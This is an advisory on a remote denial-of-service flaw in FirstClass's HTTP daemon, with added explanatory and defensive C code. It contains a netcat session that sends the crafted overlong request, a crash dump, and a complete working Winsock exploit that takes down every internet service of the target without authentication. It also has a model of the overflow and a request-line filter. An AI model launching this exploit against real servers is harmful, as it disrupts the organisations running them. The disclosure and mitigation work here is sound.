###########################################################################################
~ I2S LAB Security Advisory ~
###########################################################################################

http://www.I2S-LAB.com

Date             : 25/09/2003
Affected systems : FirstClass build 133 (SP3) and previous versions, HTTP daemon
Vendor           : http://www.centrinity.com
Issue            : Attackers can remotely shut down the internet services (HTTP/FTP/SMTP/POP3/IMAP4/...)

Description
___________

FirstClass is a suite of products that lets a company set up a reliable intranet with integrated internet services covering the most common communication protocols (SMTP, HTTP, FTP, ...).

Technical Details
_________________

The HTTP daemon of FirstClass's "Internet Services" plug-in (fcintsrv.exe) has a remote denial-of-service vulnerability: a heap overflow overwrites a data pointer. Sending a request line to port 80 of the form

    GET / HTTP/1.1[246 bytes of filler]

(the proof of concept below uses 242 'A's followed by "DDDD", so the overwritten pointer becomes 0x44444444) makes Internet Services dereference the clobbered pointer in CList::GetNext. The read goes to 0x4444444C (the pointer plus 8), an address that is not mapped in the process, so the access violation terminates fcintsrv.exe. Because the Internet Services plug-in runs HTTP, FTP, SMTP, POP3 and IMAP4 in that one process, every internet service goes down, and no authentication is needed to trigger it.
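To make the mechanism concrete, here is an added model of the overflow. It is not the advisory's code and not FirstClass code: the heap chunk layout (a 256-byte request-line buffer immediately followed by a 32-bit CList node pointer), the buffer size and the pointer's initial value are assumptions chosen so that the numbers match the proof of concept. The unchecked copy lets the trailing "DDDD" of the 260-byte line become 0x44444444 (the ECX in the crash dump below, which "mov eax, [ecx+08]" then dereferences at 0x4444444C); the bounded copy beside it refuses the same line.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed layout of the vulnerable heap chunk: a 256-byte buffer that
 * receives the request line, immediately followed by a 32-bit CList node
 * pointer (the target is a 32-bit process). 256 = 14 bytes of
 * "GET / HTTP/1.1" + 242 x 'A', so the "DDDD" that follows lands exactly on
 * the pointer. Chunk and sizes are a model, not fcintsrv.exe's real layout. */
#define LINE_BUF    256
#define CHUNK_SIZE  (LINE_BUF + sizeof(uint32_t))
#define INITIAL_PTR 0x00C802F0u   /* assumed pointer value before the overflow */

/* Read/write the pointer field that sits at the end of the chunk. */
static uint32_t get_list_ptr(const unsigned char *chunk)
{
    uint32_t p;
    memcpy(&p, chunk + LINE_BUF, sizeof p);
    return p;
}
static void set_list_ptr(unsigned char *chunk, uint32_t p)
{
    memcpy(chunk + LINE_BUF, &p, sizeof p);
}

/* Builds the advisory's request line (constructed here, not captured):
 * "GET / HTTP/1.1" + 242 x 'A' + "DDDD". Returns its length, 260. */
size_t build_poc_line(unsigned char *out, size_t cap)
{
    const char *prefix = "GET / HTTP/1.1";
    size_t plen = strlen(prefix);
    size_t total = plen + 242 + 4;
    if (cap < total) return 0;
    memcpy(out, prefix, plen);
    memset(out + plen, 'A', 242);
    memcpy(out + plen + 242, "DDDD", 4);
    return total;
}

/* Vulnerable copy: the only bound is the length the client supplied, so
 * bytes 256..259 of a 260-byte line overwrite the pointer. */
void copy_line_unchecked(unsigned char *chunk, const unsigned char *src, size_t len)
{
    memcpy(chunk, src, len);
}

/* Hardened copy: refuses a line that does not fit (one byte is kept for the
 * NUL) and leaves the chunk untouched. Returns 0 = copied, -1 = rejected. */
int copy_line_checked(unsigned char *chunk, const unsigned char *src, size_t len)
{
    if (len >= LINE_BUF) return -1;
    memcpy(chunk, src, len);
    chunk[len] = '\0';
    return 0;
}

/* Pointer value after the unchecked copy; 'D' is 0x44, so this is
 * 0x44444444, the ECX shown in the crash dump. */
uint32_t list_pointer_after_overflow(void)
{
    unsigned char *chunk = calloc(1, CHUNK_SIZE);
    unsigned char line[512];
    size_t n = build_poc_line(line, sizeof line);
    uint32_t p;
    if (!chunk) return 0;
    set_list_ptr(chunk, INITIAL_PTR);
    copy_line_unchecked(chunk, line, n);
    p = get_list_ptr(chunk);
    free(chunk);
    return p;
}

/* The faulting instruction is "mov eax, dword ptr [ecx+08]": this is the
 * address it reads once ECX holds the clobbered pointer (0x4444444C). */
uint32_t faulting_read_address(uint32_t list_ptr)
{
    return list_ptr + 8;
}

/* Same line through the hardened copy: 1 if it is rejected and the pointer
 * still holds INITIAL_PTR, else 0. */
int hardened_keeps_pointer(void)
{
    unsigned char chunk[CHUNK_SIZE];
    unsigned char line[512];
    size_t n = build_poc_line(line, sizeof line);
    int rc;
    memset(chunk, 0, sizeof chunk);
    set_list_ptr(chunk, INITIAL_PTR);
    rc = copy_line_checked(chunk, line, n);
    return rc == -1 && get_list_ptr(chunk) == INITIAL_PTR;
}

int main(void)
{
    uint32_t p = list_pointer_after_overflow();
    printf("list pointer after unchecked copy : %08X\n", (unsigned)p);
    printf("address CList::GetNext would read : %08X\n", (unsigned)faulting_read_address(p));
    printf("hardened copy rejects the line    : %s\n", hardened_keeps_pointer() ? "yes" : "no");
    return 0;
}
```

The pointer is kept as an integer and never dereferenced, so the model reproduces the overwritten register value without crashing; in the real daemon the next CList::GetNext call performs the read and the process dies.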
D:\netcat>nc -vv 10.0.0.5 80
I2S-w2k [10.0.0.5] 80 (http) open
GET / HTTP/1.1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAADDDD
sent 262, rcvd 0: NOTSOCK

D:\netcat>

*** Exception in program C:\FCServer\fcintsrv.exe
Location: CList::GetNext+0000003C (004F882C)
Error: Access violation
Cause: Read attempted at (4444444C)

Registers:
EAX=01F2415C EBX=00C802F0 ECX=44444444 <-- pointer is overwritten here
EDX=01F2415C ESI=00000000 EDI=00000000
EIP=004F882C ESP=0205F86C EBP=0205F870 Flags=00000206
CS=0000001B DS=00000023 SS=00000023 ES=00000023 FS=00000038 GS=00000000

:004F881D 8B55FC    mov edx, dword ptr [ebp-04]
:004F8820 837A0400  cmp dword ptr [edx+04], 00000000
:004F8824 740B      je 004F8831
:004F8826 8B45FC    mov eax, dword ptr [ebp-04]
:004F8829 8B4804    mov ecx, dword ptr [eax+04]
:004F882C 8B4108    mov eax, dword ptr [ecx+08] <-- crash occurs
:004F882F EB02      jmp 004F8833

Exploit
_______

/*******************************************
 * FirstClass Internet Services Remote DoS *
 *******************************************
 discovered & coded by I2S-LAB
 --------------------------------------------
 This exploit uses a ptr overflow to remotely shutdown the Internet Services of FirstClass.
 CONTACT
 _______
 Fred CHAVEROT : fred[at]I2S-LAB.com
 Aurélien BOUDOUX : aurelien[at]I2S-LAB.com
 URL : http://www.I2S-LaB.com
*******************************************/

#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib,"wsock32.lib")

/* bytes sent after "GET / HTTP/1.1": 242 x 'A' followed by "DDDD" */
#define PerfectOverwrite 246

int main (int argc, char *argv[])
{
    SOCKET sock1;
    SOCKADDR_IN sin;
    char *sav;
    WSADATA wsadata;
    WORD wVersionRequested = MAKEWORD (2,0);

    printf ("- FirstClass Internet Services Remote DoS -\n\n"
            "Discovered & coded by I2S-LAB\n"
            "http://www.I2S-LaB.com\n\n");

    if (argc < 2) {
        printf ("Usage : %s <target ip>\n", argv[0]);
        ExitProcess (0);
    }

    if (WSAStartup (wVersionRequested, &wsadata))
        ExitProcess (0);

    /* 14 (request line) + 242 ('A') + 8 ("DDDD\r\n\r\n") + NUL = 265 bytes fit in 20 + 246;
       LPTR returns zeroed memory, so lstrcat can be used on it directly */
    if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite))) {
        printf ("Error ! cannot allocate enough memory.\n");
        WSACleanup ();
        ExitProcess (0);
    }

    lstrcat (sav, "GET / HTTP/1.1");
    memset (&sav[14], 'A', PerfectOverwrite - 4);   /* 242 x 'A' */
    lstrcat (sav, "DDDD\r\n\r\n");                  /* "DDDD" lands on the list pointer: 0x44444444 */

    sin.sin_family = AF_INET;
    sin.sin_port = htons (80);
    if ((sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE) {
        printf ("Incorrect IP Address : %s\n", argv[1]);
        WSACleanup ();
        ExitProcess (0);
    }

    sock1 = socket (AF_INET, SOCK_STREAM, 0);
    if (sock1 == INVALID_SOCKET) {
        printf ("socket() failed!\n");
        WSACleanup ();
        ExitProcess (0);
    }

    printf ("\nconnecting to %s...", argv[1]);
    if (connect (sock1, (SOCKADDR *) &sin, sizeof (sin)) == SOCKET_ERROR)
        printf ("connection failed!\n");
    else {
        printf ("ok!\nSending crafted request...");
        send (sock1, sav, PerfectOverwrite + 18, 0);   /* 264 bytes: the whole request without the NUL */
        puts ("ok!");
    }

    closesocket (sock1);
    LocalFree (sav);
    WSACleanup ();
    return 0;
}

Solution
________

Centrinity Corp. has been notified and is currently working on a fix. Until it is available, we advise placing a filter in front of the server that rejects HTTP requests whose request line exceeds a sane length; the proof of concept needs a 260-byte request line.

Credits
_______

Aurélien BOUDOUX - aurelien[at]I2S-LaB.com
Fred CHAVEROT - fred[at]I2S-LaB.com
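As a concrete form of the filter recommended under Solution, the following is an added example, not code from the advisory or from Centrinity. It checks the request line of a raw HTTP request before the request is forwarded: a line with no CRLF inside an assumed limit (REQLINE_MAX = 255, below the 260-byte PoC line) is dropped, and so is a line whose version token is not exactly HTTP/x.y, which catches the "HTTP/1.1AAAA..." shape even when the length check is looser. The function and enum names and the sample requests are constructed for this example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed limit on the request line (method SP target SP version, CRLF
 * excluded). 255 is below the 260-byte line the proof of concept sends;
 * choose what your real URLs need, the point is that it is finite. */
#define REQLINE_MAX 255

enum reqline_verdict {
    REQLINE_OK = 0,
    REQLINE_TOO_LONG,     /* no CRLF within REQLINE_MAX + 2 bytes */
    REQLINE_BAD_METHOD,   /* method empty or not made of token characters */
    REQLINE_BAD_TARGET,   /* request target missing or empty (HTTP/0.9 is refused too) */
    REQLINE_BAD_VERSION   /* remainder of the line is not exactly "HTTP/<digit>.<digit>" */
};

/* RFC 2616 token character: printable ASCII minus the separators. */
static int is_tchar(unsigned char c)
{
    return c > 0x20 && c < 0x7f && strchr("()<>@,;:\\\"/[]?={}", c) == NULL;
}

/* Checks the first line of a raw request buffer of n bytes. */
enum reqline_verdict check_request_line(const char *req, size_t n)
{
    size_t limit = (n < REQLINE_MAX + 2) ? n : REQLINE_MAX + 2;
    size_t eol = 0, i, t, vlen;
    const char *v;

    /* 1. CRLF must appear within the limit; otherwise the line is too long
     *    (or never terminated) and its contents are not even inspected. */
    while (eol + 1 < limit && !(req[eol] == '\r' && req[eol + 1] == '\n'))
        eol++;
    if (eol + 1 >= limit)
        return REQLINE_TOO_LONG;

    /* 2. method: one or more token characters, then a single SP */
    for (i = 0; i < eol && is_tchar((unsigned char)req[i]); i++)
        ;
    if (i == 0 || i >= eol || req[i] != ' ')
        return REQLINE_BAD_METHOD;

    /* 3. target: non-empty, ends at the next SP */
    t = ++i;
    while (i < eol && req[i] != ' ')
        i++;
    if (i == t || i >= eol)
        return REQLINE_BAD_TARGET;

    /* 4. version: everything after that SP must be exactly HTTP/x.y, so the
     *    PoC's "HTTP/1.1AAAA..." fails here even if the length check were looser */
    v = req + i + 1;
    vlen = eol - (i + 1);
    if (vlen != 8 || memcmp(v, "HTTP/", 5) != 0 ||
        !isdigit((unsigned char)v[5]) || v[6] != '.' || !isdigit((unsigned char)v[7]))
        return REQLINE_BAD_VERSION;

    return REQLINE_OK;
}

/* Constructed sample (not captured traffic): an ordinary request. */
enum reqline_verdict normal_verdict(void)
{
    static const char req[] = "GET /index.html HTTP/1.1\r\nHost: fc.example\r\n\r\n";
    return check_request_line(req, sizeof req - 1);
}

/* The advisory's request, rebuilt: "GET / HTTP/1.1" + 242 x 'A' + "DDDD" + CRLFCRLF. */
enum reqline_verdict poc_verdict(void)
{
    char req[300];
    size_t n = 0;
    memcpy(req + n, "GET / HTTP/1.1", 14); n += 14;
    memset(req + n, 'A', 242);             n += 242;
    memcpy(req + n, "DDDD\r\n\r\n", 8);    n += 8;
    return check_request_line(req, n);
}

/* Short enough to pass the length check, but the version token is garbage. */
enum reqline_verdict bad_version_verdict(void)
{
    static const char req[] = "GET / HTTP/1.1AAAA\r\n\r\n";
    return check_request_line(req, sizeof req - 1);
}

int main(void)
{
    printf("normal request  : %d\n", normal_verdict());        /* 0 = REQLINE_OK */
    printf("PoC request     : %d\n", poc_verdict());           /* 1 = REQLINE_TOO_LONG */
    printf("junk after HTTP : %d\n", bad_version_verdict());   /* 4 = REQLINE_BAD_VERSION */
    return 0;
}
```

The check only inspects the request line, which is all this advisory needs; a production filter would also cap header count and header length, since the same unbounded-copy pattern may exist elsewhere in the daemon.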